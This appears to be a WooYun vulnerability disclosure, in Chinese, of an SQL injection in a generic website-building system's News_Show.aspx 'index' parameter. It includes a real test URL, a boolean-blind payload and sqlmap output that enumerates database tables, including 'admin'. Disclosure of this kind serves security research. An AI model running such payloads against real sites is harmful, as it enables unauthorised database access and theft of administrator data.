乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-07: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-05-22: 厂商已经主动忽略漏洞,细节向公众公开
某通用型建站系统一处SQL注入
前人提交过 WooYun: 某建站程序#通用注入打包 案例见: WooYun: 某建站程序#通用注入打包 漏洞文件:News_Show.aspx参数:index
TEST:http://www.frontcn.com/News_Show.aspx?index=313
Place: GETParameter: index Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: index=313 AND 6001=6001---[13:51:37] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft Access[13:51:37] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'[13:51:37] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'[13:51:37] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:51:37] [INFO] retrieved:[13:51:39] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[13:51:39] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'[13:51:39] [ERROR] cannot retrieve table names, back-end DBMS is Accessdo you want to use common table existence check? [Y/n/q] y[13:51:43] [INFO] checking table existence using items from 'D:\python\sqlmap\txt\common-tables.txt'[13:51:43] [INFO] adding words used on web page to the check listplease enter number of threads? [Enter for 1 (current)] 9[13:51:44] [INFO] starting 9 threads[13:51:46] [INFO] retrieved: product[13:51:48] [INFO] retrieved: admin[13:51:50] [INFO] retrieved: news[13:51:51] [INFO] retrieved: order[13:52:12] [INFO] retrieved: job[13:53:55] [INFO] retrieved: ad[13:54:02] [INFO] retrieved: new[13:54:24] [INFO] retrieved: messageDatabase: Microsoft_Access_masterdb[8 tables]+---------+| order || ad || admin || job || message || new || news || product |+---------+
RT
未能联系到厂商或者厂商积极拒绝